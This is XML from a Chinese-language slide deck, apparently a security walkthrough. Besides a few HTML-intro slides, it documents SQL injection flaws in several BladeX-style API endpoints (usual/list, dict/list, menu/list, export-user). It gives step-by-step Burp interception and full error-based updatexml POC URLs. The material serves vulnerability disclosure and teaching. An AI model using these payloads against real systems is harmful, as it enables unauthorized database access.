                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>。</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:ea typeface="阿里巴巴普惠体" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="899795" lvl="5" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="Ø"/>
                </a:pP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HTML</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代码直接在浏览器中运行，</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HTML</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标签由浏览器解析。</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9795" lvl="5" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="Ø"/>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跨平台</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9795" lvl="5" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="Ø"/>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浏览器兼容性</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99795" lvl="5" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="Ø"/>
                </a:pP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6" name="矩形: 对角圆角 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920209" y="1823315"/>
                <a:ext cx="1917191" cy="431800"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 30835"/>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HTML</a:t>
                </a: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是什么</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5" name="Shape 2375"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1062260" y="1722477"/>
              <a:ext cx="228197" cy="279459"/>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bg1"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:noFill/>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solidFill>
                  <a:srgbClr val="F4B246"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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/blade-log/usual/list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>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descr="usual接口存在SQL注入漏洞"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="532130" y="1174750"/>
            <a:ext cx="10536555" cy="5550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/blade-log/usual/list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>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57785" y="1214120"/>
            <a:ext cx="11323955" cy="5100320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果能过去到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以在浏览器中通过增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>blade-auth={token}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的方式加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的方式进行报错注入。</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en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求方式：GET</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>完整POC：http://{ip}:{port}/api/blade-log/usual/list?blade-auth=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>{token}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>&amp;updatexml(1,concat(0x7e,user(),0x7e),1)=1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="browser-usual接口存在SQL注入漏洞"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="182880" y="1910080"/>
            <a:ext cx="11550015" cy="2181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/blade-system/dict/lis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>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57785" y="1214120"/>
            <a:ext cx="4550410" cy="5100320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/api/blade-system/dict/list接口：是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>blade-system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务模块下查询数据库的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>接口。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>首先在登录之后获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>然后通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>抓包拦截请求构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>报错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>右图是该接口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的接入点。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="网站切入点"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5882005" y="1214120"/>
            <a:ext cx="4251960" cy="5144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/blade-system/dict/lis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" spc="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:uLnTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="+mn-ea"/>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endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="dict-biz接口存在sql注入漏洞"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="144780" y="1371600"/>
            <a:ext cx="11071225" cy="5018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/blade-system/dict/lis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" spc="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:uLnTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="+mn-ea"/>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如果能过去到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以在浏览器中通过增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>blade-auth={token}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的方式加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的方式进行报错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入。</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en-US" altLang="zh-CN"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求方式：GET</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>完整POC：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>http://{ip}:{port}/api/blade-system/dict/list?blade-auth=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>{token}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>&amp;updatexml(1,concat(0x7e,version(),0x7e),1)=1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="browser-dict-biz接口存在sql注入漏洞"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="306070" y="2068195"/>
            <a:ext cx="11271250" cy="2056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/blade-system/menu/list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4445000" cy="5100320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接口：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/api/blade-system/menu/list，该接口也是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>blade-system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块下对菜单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查询。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入方式也是一样，首先要获取登录后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，然后在根据网站接口作为切入点利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行拦截，最后对拦截的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的报错注入。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="网站切入点"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5137150" y="1352550"/>
            <a:ext cx="5917565" cy="3960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/blade-system/menu/list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endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="menu接口存在SQL注入漏洞"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1315720"/>
            <a:ext cx="12192000" cy="4361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/blade-system/menu/list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如果能过去到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以在浏览器中通过增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>blade-auth={token}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的方式加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的方式进行报错注入。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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en-US" altLang="zh-CN"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求方式：GET</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>完整POC：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>http://{ip}:{port}/api/blade-system/menu/list?blade-auth=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>{token}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>&amp;updatexml(1,concat(0x7e,version(),0x7e),1)=1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="brower-menu接口存在SQL注入漏洞"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="144780" y="1988820"/>
            <a:ext cx="11766550" cy="2023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/blade-user/export-user</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858625" cy="5100320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接口：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/blade-user/export-user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，该接口也是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>blade-user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块下对用户的导出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>功能。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入方式也是一样，首先要获取登录后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，然后在根据网站接口作为切入点利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行拦截，最后对拦截的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的报错注入。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="网站切入点"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="144780" y="2674620"/>
            <a:ext cx="11699240" cy="3571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/blade-user/export-user</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endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="export-user SQL 注入漏洞"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="285115" y="1287780"/>
            <a:ext cx="11029950" cy="5026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sym typeface="+mn-ea"/>
              </a:rPr>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10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="269559" y="2089110"/>
            <a:ext cx="5687891" cy="3718507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="流程 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538154" y="2514158"/>
            <a:ext cx="5227645" cy="1029101"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3810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流程 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="526901" y="3609533"/>
            <a:ext cx="5227645" cy="1559327"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3810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604000" y="2089110"/>
            <a:ext cx="4160846" cy="42504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HTML</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
